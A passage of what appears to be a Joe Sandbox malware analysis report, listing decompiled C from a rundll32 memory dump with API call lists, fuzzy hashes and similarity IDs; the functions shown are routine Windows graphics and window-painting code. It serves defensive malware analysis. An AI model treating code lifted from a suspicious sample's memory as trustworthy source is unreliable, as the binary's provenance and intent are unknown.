                          								E00E31054();
                          							}
                          						}
                          						_push(_t333);
                          						_push( *[fs:eax]);
                          						 *[fs:eax] = _t335;
                          						E00E290D4(_v12, _t331, _v24);
                          						_pop(_t299);
                          						 *[fs:eax] = _t299;
                          						_t300 = 0xe35a5e;
                          						 *[fs:eax] = _t300;
                          						_push(0xe35a96);
                          						return ReleaseDC(0, _v16);
                          					} else {
                          						goto L27;
                          					}
                          				} else {
                          					L27:
                          					_v20 = 0;
                          					_v24 = E00E126CC(_t331);
                          					_push(_t333);
                          					_push(0xe359f7);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t335;
                          					_t273 = _t331;
                          					E00E290D4(_v12, _t331, _v24);
                          					_v20 = E00E31174(CreateCompatibleDC(_v16));
                          					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
                          					_v56 = 0;
                          					_t193 =  *(_v64 + 0x20);
                          					if(_t193 > 0) {
                          						_t273 = _t193;
                          						_v52 = E00E31864(0, _t193);
                          						_v56 = SelectPalette(_v20, _v52, 0);
                          						RealizePalette(_v20);
                          					}
                          					_push(_t333);
                          					_push(0xe359cb);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t335;
                          					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
                          					if(_v44 == 0) {
                          						if(GetLastError() != 0) {
                          							E00E1CDE4(_t255, _t273, _t327, _t331);
                          						} else {
                          							E00E31054();
                          						}
                          					}
                          					_pop(_t305);
                          					 *[fs:eax] = _t305;
                          					_push(0xe359d2);
                          					if(_v56 != 0) {
                          						SelectPalette(_v20, _v56, 0xffffffff);
                          					}
                          					return DeleteObject(SelectObject(_v20, _v48));
                          				}
			}

                          APIs
                          • GetDC.USER32(00000000), ref: 00E3588E
                          • CreateCompatibleDC.GDI32(00000001), ref: 00E358F3
                          • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00E35908
                          • SelectObject.GDI32(?,00000000), ref: 00E35912
                          • SelectPalette.GDI32(?,?,00000000), ref: 00E35942
                          • RealizePalette.GDI32(?), ref: 00E3594E
                          • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00E35972
                          • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00E359CB,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00E35980
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 00E359B2
                          • SelectObject.GDI32(?,?), ref: 00E359BF
                          • DeleteObject.GDI32(00000000), ref: 00E359C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                          • String ID: ($BM$lT
                          • API String ID: 2831685396-3738863254
                          • Opcode ID: ff4f5bb0e238b8ca823669f6ed7b8b8e4dfe51225d98dead30258f892b959cd0
                          • Instruction ID: 12c8da3cf57cf0999b835b49eb7a62f6e4281a2f680f47194d2075fe96c9760d
                          • Opcode Fuzzy Hash: ff4f5bb0e238b8ca823669f6ed7b8b8e4dfe51225d98dead30258f892b959cd0
                          • Instruction Fuzzy Hash: 5ED12575A006089FDF14EFA8C889AAEBBF5FF48304F149569E914FB395D7349880CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00E34D20(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				struct HPALETTE__* _v12;
                          				char _v13;
                          				struct tagPOINT _v21;
                          				struct HDC__* _v28;
                          				void* _v32;
                          				struct HPALETTE__* _t78;
                          				signed int _t84;
                          				signed int _t85;
                          				signed int _t86;
                          				char _t87;
                          				void* _t94;
                          				void* _t140;
                          				intOrPtr* _t170;
                          				intOrPtr _t178;
                          				intOrPtr _t182;
                          				intOrPtr _t184;
                          				intOrPtr _t186;
                          				int* _t190;
                          				intOrPtr _t192;
                          				void* _t194;
                          				void* _t195;
                          				intOrPtr _t196;
                          
                          				_t171 = __ecx;
                          				_t194 = _t195;
                          				_t196 = _t195 + 0xffffffe4;
                          				_t190 = __ecx;
                          				_v8 = __edx;
                          				_t170 = __eax;
                          				_t192 =  *((intOrPtr*)(__eax + 0x28));
                          				_t178 =  *0xe34f6c; // 0xf
                          				E00E30E50(_v8, __ecx, _t178);
                          				E00E3539C(_t170);
                          				_v12 = 0;
                          				_v13 = 0;
                          				_t78 =  *(_t192 + 0x10);
                          				if(_t78 != 0) {
                          					_v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
                          					RealizePalette( *(_v8 + 4));
                          					_v13 = 1;
                          				}
                          				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
                          				_t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
                          				_pop(_t85);
                          				_t86 = _t85 * _t84;
                          				if(_t86 > 8) {
                          					L4:
                          					_t87 = 0;
                          				} else {
                          					_t171 =  *(_t192 + 0x28) & 0x0000ffff;
                          					if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
                          						_t87 = 1;
                          					} else {
                          						goto L4;
                          					}
                          				}
                          				if(_t87 == 0) {
                          					if(E00E350AC(_t170) == 0) {
                          						SetStretchBltMode(E00E30D7C(_v8), 3);
                          					}
                          				} else {
                          					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                          					SetStretchBltMode( *(_v8 + 4), 4);
                          					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                          				}
                          				_push(_t194);
                          				_push(0xe34f5c);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t196;
                          				if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
                          					E00E3533C(_t170, _t171);
                          				}
                          				_t94 = E00E34FF0(_t170);
                          				_t182 =  *0xe34f6c; // 0xf
                          				E00E30E50(_t94, _t171, _t182);
                          				if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
                          					StretchBlt( *(_v8 + 4),  *_t190, _t190[1], _t190[2] -  *_t190, _t190[3] - _t190[1],  *(E00E34FF0(_t170) + 4), 0, 0,  *(_t192 + 0x1c),  *(_t192 + 0x20),  *(_v8 + 0x20));
                          					_pop(_t184);
                          					 *[fs:eax] = _t184;
                          					_push(0xe34f63);
                          					if(_v13 != 0) {
                          						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
                          					}
                          					return 0;
                          				} else {
                          					_v32 = 0;
                          					_v28 = 0;
                          					_push(_t194);
                          					_push(0xe34ef1);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t196;
                          					_v28 = E00E31174(CreateCompatibleDC(0));
                          					_v32 = SelectObject(_v28,  *(_t192 + 0xc));
                          					E00E31318( *(_v8 + 4), _t170, _t190[1],  *_t190, _t190, _t192, 0, 0, _v28,  *(_t192 + 0x20),  *(_t192 + 0x1c), 0, 0,  *(E00E34FF0(_t170) + 4), _t190[3] - _t190[1], _t190[2] -  *_t190);
                          					_t140 = 0;
                          					_pop(_t186);
                          					 *[fs:eax] = _t186;
                          					_push(0xe34f36);
                          					if(_v32 != 0) {
                          						_t140 = SelectObject(_v28, _v32);
                          					}
                          					if(_v28 != 0) {
                          						return DeleteDC(_v28);
                          					}
                          					return _t140;
                          				}
                          			}
                          0x00e34d20
                          0x00e34d21
                          0x00e34d23
                          0x00e34d29
                          0x00e34d2b
                          0x00e34d2e
                          0x00e34d30
                          0x00e34d33
                          0x00e34d3c
                          0x00e34d43
                          0x00e34d4a
                          0x00e34d4d
                          0x00e34d51
                          0x00e34d56
                          0x00e34d67
                          0x00e34d71
                          0x00e34d76
                          0x00e34d76
                          0x00e34d88
                          0x00e34d92
                          0x00e34d99
                          0x00e34d9a
                          0x00e34d9f
                          0x00e34db0
                          0x00e34db0
                          0x00e34da1
                          0x00e34da5
                          0x00e34dae
                          0x00e34db4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00e34dae
                          0x00e34db8
                          0x00e34dfb
                          0x00e34e08
                          0x00e34e08
                          0x00e34dba
                          0x00e34dc5
                          0x00e34dd3
                          0x00e34deb
                          0x00e34deb
                          0x00e34e0f
                          0x00e34e10
                          0x00e34e15
                          0x00e34e18
                          0x00e34e24
                          0x00e34e28
                          0x00e34e28
                          0x00e34e2f
                          0x00e34e34
                          0x00e34e3a
                          0x00e34e48
                          0x00e34f31
                          0x00e34f38
                          0x00e34f3b
                          0x00e34f3e
                          0x00e34f47
                          0x00000000
                          0x00e34f56
                          0x00e34f5b
                          0x00e34e4e
                          0x00e34e50
                          0x00e34e55
                          0x00e34e5a
                          0x00e34e5b
                          0x00e34e60
                          0x00e34e63
                          0x00e34e72
                          0x00e34e82
                          0x00e34ebc
                          0x00e34ec1
                          0x00e34ec3
                          0x00e34ec6
                          0x00e34ec9
                          0x00e34ed2
                          0x00e34edc
                          0x00e34edc
                          0x00e34ee5
                          0x00000000
                          0x00e34eeb
                          0x00e34ef0
                          0x00e34ef0

                          APIs
                            • Part of subcall function 00E3539C: GetDC.USER32(00000000), ref: 00E353F2
                            • Part of subcall function 00E3539C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E35407
                            • Part of subcall function 00E3539C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00E35411
                            • Part of subcall function 00E3539C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00E33EE7,00000000,00E33F73), ref: 00E35435
                            • Part of subcall function 00E3539C: ReleaseDC.USER32 ref: 00E35440
                          • SelectPalette.GDI32(?,?,000000FF), ref: 00E34D62
                          • RealizePalette.GDI32(?), ref: 00E34D71
                          • GetDeviceCaps.GDI32(?,0000000C), ref: 00E34D83
                          • GetDeviceCaps.GDI32(?,0000000E), ref: 00E34D92
                          • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 00E34DC5
                          • SetStretchBltMode.GDI32(?,00000004), ref: 00E34DD3
                          • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00E34DEB
                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 00E34E08
                          • CreateCompatibleDC.GDI32(00000000), ref: 00E34E68
                          • SelectObject.GDI32(?,?), ref: 00E34E7D
                          • SelectObject.GDI32(?,00000000), ref: 00E34EDC
                          • DeleteDC.GDI32(00000000), ref: 00E34EEB
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                          • String ID:
                          • API String ID: 2414602066-0
                          • Opcode ID: 80ea553358243992adb49cc544492fa8c416b4a27be6142a2d65ba4e692aea68
                          • Instruction ID: 4145e89f612662c079911446e278366097a368046481378a7366f0b945d1a875
                          • Opcode Fuzzy Hash: 80ea553358243992adb49cc544492fa8c416b4a27be6142a2d65ba4e692aea68
                          • Instruction Fuzzy Hash: 127109B5B00205AFDB50DFACC999F9EBBF8AF08304F15A594B508EB692D634ED44CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E00E31184(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                          				void* _v8;
                          				int _v12;
                          				int _v16;
                          				struct HBITMAP__* _v20;
                          				struct HDC__* _v24;
                          				struct HDC__* _v28;
                          				struct HDC__* _v32;
                          				int _v48;
                          				int _v52;
                          				void _v56;
                          				void* _t78;
                          				intOrPtr _t85;
                          				intOrPtr _t86;
                          				void* _t91;
                          				void* _t93;
                          				void* _t94;
                          				intOrPtr _t95;
                          
                          				_t93 = _t94;
                          				_t95 = _t94 + 0xffffffcc;
                          				asm("movsd");
                          				asm("movsd");
                          				_t77 = __ecx;
                          				_v8 = __eax;
                          				_v28 = CreateCompatibleDC(0);
                          				_v32 = CreateCompatibleDC(0);
                          				_push(_t93);
                          				_push(0xe312d2);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t95;
                          				GetObjectA(_v8, 0x18,  &_v56);
                          				if(__ecx == 0) {
                          					_v24 = GetDC(0);
                          					if(_v24 == 0) {
                          						E00E310CC(_t77);
                          					}
                          					_push(_t93);
                          					_push(0xe31241);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t95;
                          					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
                          					if(_v20 == 0) {
                          						E00E310CC(_t77);
                          					}
                          					_pop(_t85);
                          					 *[fs:eax] = _t85;
                          					_push(0xe31248);
                          					return ReleaseDC(0, _v24);
                          				} else {
                          					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
                          					if(_v20 != 0) {
                          						_t78 = SelectObject(_v28, _v8);
                          						_t91 = SelectObject(_v32, _v20);
                          						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                          						if(_t78 != 0) {
                          							SelectObject(_v28, _t78);
                          						}
                          						if(_t91 != 0) {
                          							SelectObject(_v32, _t91);
                          						}
                          					}
                          					_pop(_t86);
                          					 *[fs:eax] = _t86;
                          					_push(0xe312d9);
                          					DeleteDC(_v28);
                          					return DeleteDC(_v32);
                          				}
                          			}

                          0x00e31185
                          0x00e31187
                          0x00e31192
                          0x00e31193
                          0x00e31194
                          0x00e31196
                          0x00e311a0
                          0x00e311aa
                          0x00e311af
                          0x00e311b0
                          0x00e311b5
                          0x00e311b8
                          0x00e311c5
                          0x00e311cc
                          0x00e311ed
                          0x00e311f4
                          0x00e311f6
                          0x00e311f6
                          0x00e311fd
                          0x00e311fe
                          0x00e31203
                          0x00e31206
                          0x00e3121a
                          0x00e31221
                          0x00e31223
                          0x00e31223
                          0x00e3122a
                          0x00e3122d
                          0x00e31230
                          0x00e31240
                          0x00e311ce
                          0x00e311e1
                          0x00e3124c
                          0x00e3125b
                          0x00e3126a
                          0x00e31291
                          0x00e31298
                          0x00e3129f
                          0x00e3129f
                          0x00e312a6
                          0x00e312ad
                          0x00e312ad
                          0x00e312a6
                          0x00e312b4
                          0x00e312b7
                          0x00e312ba
                          0x00e312c3
                          0x00e312d1
                          0x00e312d1

                          APIs
                          • CreateCompatibleDC.GDI32(00000000), ref: 00E3119B
                          • CreateCompatibleDC.GDI32(00000000), ref: 00E311A5
                          • GetObjectA.GDI32(?,00000018,?), ref: 00E311C5
                          • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00E311DC
                          • GetDC.USER32(00000000), ref: 00E311E8
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E31215
                          • ReleaseDC.USER32 ref: 00E3123B
                          • SelectObject.GDI32(?,?), ref: 00E31256
                          • SelectObject.GDI32(?,00000000), ref: 00E31265
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00E31291
                          • SelectObject.GDI32(?,00000000), ref: 00E3129F
                          • SelectObject.GDI32(?,00000000), ref: 00E312AD
                          • DeleteDC.GDI32(?), ref: 00E312C3
                          • DeleteDC.GDI32(?), ref: 00E312CC
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                          • String ID:
                          • API String ID: 644427674-0
                          • Opcode ID: 32d3001ca5ea1ec64b2cd1edbfa8808295b7e879651819ac945f2b90173d9ea2
                          • Instruction ID: 08a7927723845f9b106d8bdf5e61230e5b27d702b6ebf468ec8aeaad0c7f9484
                          • Opcode Fuzzy Hash: 32d3001ca5ea1ec64b2cd1edbfa8808295b7e879651819ac945f2b90173d9ea2
                          • Instruction Fuzzy Hash: 3741B571E44209AFDB10EBE8C846FEFBBFCAB09700F515859B614F7281D674A940DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E16DC4(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                          				intOrPtr* _v8;
                          				struct HWND__* _t19;
                          				int* _t20;
                          				int* _t26;
                          				int* _t27;
                          
                          				_t26 = _t20;
                          				_t27 = __edx;
                          				_v8 = __eax;
                          				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                          				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
                          				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
                          				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
                          				if( *_t27 == 0 || _t19 == 0) {
                          					 *_a8 = 0;
                          				} else {
                          					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
                          				}
                          				if( *_t26 == 0 || _t19 == 0) {
                          					 *_a4 = 3;
                          				} else {
                          					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
                          				}
                          				return _t19;
                          			}

                          0x00e16dcb
                          0x00e16dcd
                          0x00e16dcf
                          0x00e16de1
                          0x00e16df0
                          0x00e16dfc
                          0x00e16e08
                          0x00e16e0d
                          0x00e16e2c
                          0x00e16e13
                          0x00e16e23
                          0x00e16e23
                          0x00e16e31
                          0x00e16e4e
                          0x00e16e37
                          0x00e16e47
                          0x00e16e47
                          0x00e16e5b

                          APIs
                          • FindWindowA.USER32 ref: 00E16DDC
                          • RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00E16DE8
                          • RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00E16DF7
                          • RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00E16E03
                          • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00E16E1B
                          • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00E16E3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: ClipboardFormatRegister$MessageSend$FindWindow
                          • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                          • API String ID: 1416857345-3736581797
                          • Opcode ID: 37ac073460dbdad2f64251906e21fc8a5dd29976c85ce285e100239c0d877c03
                          • Instruction ID: 676e8cfb7c75f9307407b2f8a17d9fca21b3851dffdabcf4a2744040beff0283
                          • Opcode Fuzzy Hash: 37ac073460dbdad2f64251906e21fc8a5dd29976c85ce285e100239c0d877c03
                          • Instruction Fuzzy Hash: B4112EB8344306AFE7109F64D881FEAB7E8EF45750F206625F844AB280D7B05EC0CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E00E3B68C(void* __eax, void* __ecx, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				struct HDC__* _v12;
                          				struct tagRECT _v28;
                          				struct tagRECT _v44;
                          				char _v56;
                          				char _v72;
                          				signed char _t43;
                          				signed int _t79;
                          				int _t80;
                          				int _t81;
                          				void* _t94;
                          				intOrPtr _t107;
                          				void* _t116;
                          				void* _t119;
                          				void* _t122;
                          				void* _t124;
                          				intOrPtr _t125;
                          
                          				_t122 = _t124;
                          				_t125 = _t124 + 0xffffffbc;
                          				_t94 = __ecx;
                          				_v8 = __edx;
                          				_t116 = __eax;
                          				_t43 = GetWindowLongA(E00E5CFE0(_v8), 0xffffffec);
                          				if((_t43 & 0x00000002) == 0) {
                          					return _t43;
                          				} else {
                          					GetWindowRect(E00E5CFE0(_v8),  &_v44);
                          					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                          					_v12 = GetWindowDC(E00E5CFE0(_v8));
                          					_push(_t122);
                          					_push(0xe3b7e7);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t125;
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					_t119 = _t116;
                          					if(_t94 != 0) {
                          						_t79 = GetWindowLongA(E00E5CFE0(_v8), 0xfffffff0);
                          						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
                          							_t80 = GetSystemMetrics(2);
                          							_t81 = GetSystemMetrics(3);
                          							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                          							E00E25C48(_v28.right - _t80, _v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							_t119 = _t119;
                          							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                          						}
                          					}
                          					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                          					E00E3B2C4( &_v56, 2);
                          					E00E3B218(_t119,  &_v56, _v12, 0,  &_v44);
                          					_pop(_t107);
                          					 *[fs:eax] = _t107;
                          					_push(0xe3b7ee);
                          					return ReleaseDC(E00E5CFE0(_v8), _v12);
                          				}
                          			}

                          0x00e3b68d
                          0x00e3b68f
                          0x00e3b695
                          0x00e3b697
                          0x00e3b69a
                          0x00e3b6a7
                          0x00e3b6af
                          0x00e3b7f4
                          0x00e3b6b5
                          0x00e3b6c2
                          0x00e3b6d7
                          0x00e3b6ea
                          0x00e3b6ef
                          0x00e3b6f0
                          0x00e3b6f5
                          0x00e3b6f8
                          0x00e3b702
                          0x00e3b703
                          0x00e3b704
                          0x00e3b705
                          0x00e3b706
                          0x00e3b709
                          0x00e3b716
                          0x00e3b720
                          0x00e3b72b
                          0x00e3b734
                          0x00e3b743
                          0x00e3b75d
                          0x00e3b769
                          0x00e3b76a
                          0x00e3b76b
                          0x00e3b76c
                          0x00e3b76d
                          0x00e3b77e
                          0x00e3b77e
                          0x00e3b720
                          0x00e3b7a3
                          0x00e3b7af
                          0x00e3b7c2
                          0x00e3b7c9
                          0x00e3b7cc
                          0x00e3b7cf
                          0x00e3b7e6
                          0x00e3b7e6

                          APIs
                          • GetWindowLongA.USER32 ref: 00E3B6A7
                          • GetWindowRect.USER32 ref: 00E3B6C2
                          • OffsetRect.USER32(?,?,?), ref: 00E3B6D7
                          • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00E3B6E5
                          • GetWindowLongA.USER32 ref: 00E3B716
                          • GetSystemMetrics.USER32 ref: 00E3B72B
                          • GetSystemMetrics.USER32 ref: 00E3B734
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00E3B743
                          • GetSysColorBrush.USER32(0000000F), ref: 00E3B770
                          • FillRect.USER32 ref: 00E3B77E
                          • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00E3B7E7,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 00E3B7A3
                          • ReleaseDC.USER32 ref: 00E3B7E1
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                          • String ID:
                          • API String ID: 19621357-0
                          • Opcode ID: b2ab2b13af46f214bd231a19bb4f9bb3c3f3468517a2a4e67e155fa1dfb7589e
                          • Instruction ID: 897bf129c4d30b5df4fc701739543f1f591ce620186ef6200179c7abe4776bbb
                          • Opcode Fuzzy Hash: b2ab2b13af46f214bd231a19bb4f9bb3c3f3468517a2a4e67e155fa1dfb7589e
                          • Instruction Fuzzy Hash: C3410C71A04118ABCB01EAA8CD46EEFBBFDEF89310F511651F915F7281CA30AA45C760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E00E3751C(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                          				struct tagPOINT _v12;
                          				int _v16;
                          				struct tagRECT _v32;
                          				struct tagRECT _v48;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t60;
                          				int _t61;
                          				RECT* _t64;
                          				struct HDC__* _t65;
                          
                          				_t64 = _a8;
                          				_t65 = _a4;
                          				if( *0xe7f923 != 0) {
                          					_t61 = 0;
                          					if(_a12 == 0) {
                          						L14:
                          						return _t61;
                          					}
                          					_v32.left = 0;
                          					_v32.top = 0;
                          					_v32.right = GetSystemMetrics(0);
                          					_v32.bottom = GetSystemMetrics(1);
                          					if(_t65 == 0) {
                          						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                          							L13:
                          							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                          						} else {
                          							_t61 = 1;
                          						}
                          						goto L14;
                          					}
                          					_v16 = GetClipBox(_t65,  &_v48);
                          					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                          						goto L14;
                          					}
                          					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                          					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                          						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                          							goto L13;
                          						}
                          						if(_v16 == 1) {
                          							_t61 = 1;
                          						}
                          						goto L14;
                          					} else {
                          						goto L13;
                          					}
                          				}
                          				 *0xe7f910 = E00E36F70(7, _t60,  *0xe7f910, _t64, _t65);
                          				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                          				goto L14;
                          			}

                          0x00e37525
                          0x00e37528
                          0x00e37532
                          0x00e37562
                          0x00e37568
                          0x00e37624
                          0x00e3762c
                          0x00e3762c
                          0x00e37570
                          0x00e37575
                          0x00e37580
                          0x00e3758b
                          0x00e37590
                          0x00e375f9
                          0x00e37611
                          0x00e37622
                          0x00e3760d
                          0x00e3760d
                          0x00e3760d
                          0x00000000
                          0x00e375f9
                          0x00e3759c
                          0x00e375ab
                          0x00000000
                          0x00000000
                          0x00e375bd
                          0x00e375d5
                          0x00e375eb
                          0x00000000
                          0x00000000
                          0x00e375f1
                          0x00e375f3
                          0x00e375f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00e375d5
                          0x00e37546
                          0x00e3755b
                          0x00000000

                          APIs
                          • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00E37555
                          • GetSystemMetrics.USER32 ref: 00E3757A
                          • GetSystemMetrics.USER32 ref: 00E37585
                          • GetClipBox.GDI32(?,?), ref: 00E37597
                          • GetDCOrgEx.GDI32(?,?), ref: 00E375A4
                          • OffsetRect.USER32(?,?,?), ref: 00E375BD
                          • IntersectRect.USER32 ref: 00E375CE
                          • IntersectRect.USER32 ref: 00E375E4
                            • Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                          • String ID: EnumDisplayMonitors
                          • API String ID: 362875416-2491903729
                          • Opcode ID: c7336defbf2a0a318d24cc5fd69875b3284ca51564a5a97445b7364eeebbc11d
                          • Instruction ID: 8cc78ff924b1ce77c406aff1b465b27ac403000c785794be7b94bff165c0ed1a
